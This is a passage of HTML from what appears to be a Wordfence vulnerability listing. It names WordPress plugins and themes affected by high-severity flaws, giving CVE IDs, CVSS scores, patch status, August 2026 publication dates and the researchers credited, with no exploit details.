														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/noman-riffat" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/noman-riffat" target="_blank" rel="noopener">Noman Riffat</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5aae14bb-855f-406a-a6a2-f784a0ae0166" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c83241b6-a992-47a7-8208-c562b89bff4c" target="_blank" rel="noopener">Simple File List &lt;= 6.3.11 &#8211; Unauthenticated Arbitrary File Read</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16616" target="_blank" rel="noopener noreferrer">							CVE-2026-16616						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-file-list" target="_blank" rel="noopener">Simple File List</a> <span class="wfvr-software-slug">[simple-file-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c83241b6-a992-47a7-8208-c562b89bff4c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2916405-bcb0-47e5-a077-ad13cefa208e" target="_blank" rel="noopener">Sticky Chat Widget – Floating Chat Icons, Contact Form, Call, Click to Chat, Email &amp; Message Buttons &lt;= 1.4.2 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73187" target="_blank" rel="noopener noreferrer">							CVE-2026-73187						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sticky-chat-widget" target="_blank" rel="noopener">Sticky Chat Widget – Floating Chat Icons, Contact Form, Call, Click to Chat, Email &amp; Message Buttons</a> <span class="wfvr-software-slug">[sticky-chat-widget]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b2916405-bcb0-47e5-a077-ad13cefa208e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f93a86e-007c-4266-836a-e7f7e4bac8dc" target="_blank" rel="noopener">Super Store Finder &lt;= 7.8 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73392" target="_blank" rel="noopener noreferrer">							CVE-2026-73392						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/superstorefinder-wp" target="_blank" rel="noopener">Super Store Finder</a> <span class="wfvr-software-slug">[superstorefinder-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/34e8630d9d966b9be2ef1801165bedf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="34e8630d9d966b9be2ef1801165bedf1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener">Denver Jackson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f93a86e-007c-4266-836a-e7f7e4bac8dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a963679f-f64e-4f85-b375-b4edd49d2008" target="_blank" rel="noopener">TheGem &#8211; Creative Multi-Purpose &amp; WooCommerce WordPress Theme &lt;= 5.12.3 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66609" target="_blank" rel="noopener noreferrer">							CVE-2026-66609						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/thegem-elementor" target="_blank" rel="noopener">TheGem &#8211; Creative Multi-Purpose &amp; WooCommerce WordPress Theme</a> <span class="wfvr-software-slug">[thegem-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a963679f-f64e-4f85-b375-b4edd49d2008" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9586c39-3018-449f-8e03-3c5920438092" target="_blank" rel="noopener">W3 Total Cache &lt; 2.10.5 &#8211; Unauthenticated Path Traversal</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18051" target="_blank" rel="noopener noreferrer">							CVE-2026-18051						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">W3 Total Cache</a> <span class="wfvr-software-slug">[w3-total-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9586c39-3018-449f-8e03-3c5920438092" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b258d827-2490-486c-9128-dc866a079aeb" target="_blank" rel="noopener">WP Cafe Pro  &lt;= 3.0.14 &#8211; Authenticated (Author+) Local File Inclusion</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66586" target="_blank" rel="noopener noreferrer">							CVE-2026-66586						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66586" target="_blank" rel="noopener">WP Cafe Pro</a> <span class="wfvr-software-slug">[wpcafe-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b258d827-2490-486c-9128-dc866a079aeb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37bb8d68-dd87-437a-80e5-e99e93dc55b6" target="_blank" rel="noopener">WPAdverts &lt;= 2.3.2 &#8211; Missing Authorization to Unauthenticated Sensitive Information Disclosure via classifieds-types REST Endpoint</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11801" target="_blank" rel="noopener noreferrer">							CVE-2026-11801						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpadverts" target="_blank" rel="noopener">WPAdverts – Classifieds Plugin</a> <span class="wfvr-software-slug">[wpadverts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/deva-parekh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68e8a7033141e73e2cf6863622c21485.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68e8a7033141e73e2cf6863622c21485"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/deva-parekh" target="_blank" rel="noopener">Deva Parekh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/37bb8d68-dd87-437a-80e5-e99e93dc55b6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f3f1e629-fe60-4793-b9f1-c02a7a2542aa" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging &lt; 0.9.131 &#8211; Unauthenticated Path Traversal</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19725" target="_blank" rel="noopener noreferrer">							CVE-2026-19725						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging</a> <span class="wfvr-software-slug">[wpvivid-backuprestore]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f3f1e629-fe60-4793-b9f1-c02a7a2542aa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16b609d7-28d5-479f-a508-394d7319c56e" target="_blank" rel="noopener">Abandoned Cart Pro for WooCommerce &lt;= 10.4.0 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66682" target="_blank" rel="noopener noreferrer">							CVE-2026-66682						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-abandon-cart-pro" target="_blank" rel="noopener">Abandoned Cart Pro for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-abandon-cart-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16b609d7-28d5-479f-a508-394d7319c56e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92c3d275-5fb3-4a8e-8a00-fcfed00e2fa0" target="_blank" rel="noopener">Capella | Restaurant WordPress &lt;= 2.5.5 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15689" target="_blank" rel="noopener noreferrer">							CVE-2025-15689						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/capella" target="_blank" rel="noopener">Capella | Restaurant WordPress</a> <span class="wfvr-software-slug">[capella]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/92c3d275-5fb3-4a8e-8a00-fcfed00e2fa0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c8b22aa-e7e3-4e20-8e4b-fa807d1d2963" target="_blank" rel="noopener">Digits: WordPress Mobile Number Signup and Login &lt;= 9.2 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28165" target="_blank" rel="noopener noreferrer">							CVE-2026-28165						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/digits" target="_blank" rel="noopener">Digits: WordPress Mobile Number Signup and Login</a> <span class="wfvr-software-slug">[digits]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c8b22aa-e7e3-4e20-8e4b-fa807d1d2963" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a26f5a05-5fca-4eaf-a309-dc3bb419e212" target="_blank" rel="noopener">SAML Single Sign On – SSO Login  4.8.85-5.4.6 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19842" target="_blank" rel="noopener noreferrer">							CVE-2026-19842						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">SAML Single Sign On – SSO Login</a> <span class="wfvr-software-slug">[miniorange-saml-20-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2dae9339cb7a7417b7eedcaf09ddf9e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2dae9339cb7a7417b7eedcaf09ddf9e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suhayb-ahmed" target="_blank" rel="noopener">Suhayb Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a26f5a05-5fca-4eaf-a309-dc3bb419e212" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/882f6ef6-3fae-42a8-80e9-f53455323287" target="_blank" rel="noopener">Simple JWT Login – Allows you to use JWT on REST endpoints. &lt; 3.6.8 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19714" target="_blank" rel="noopener noreferrer">							CVE-2026-19714						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-jwt-login" target="_blank" rel="noopener">Simple JWT Login – Allows you to use JWT on REST endpoints.</a> <span class="wfvr-software-slug">[simple-jwt-login]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/882f6ef6-3fae-42a8-80e9-f53455323287" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/51d0ab38-fa5b-4c96-a849-06d6ab3caf2b" target="_blank" rel="noopener">TabaPay Gateway &lt;= 1.4.0 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18031" target="_blank" rel="noopener noreferrer">							CVE-2026-18031						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tabapay-gateway" target="_blank" rel="noopener">TabaPay Gateway</a> <span class="wfvr-software-slug">[tabapay-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
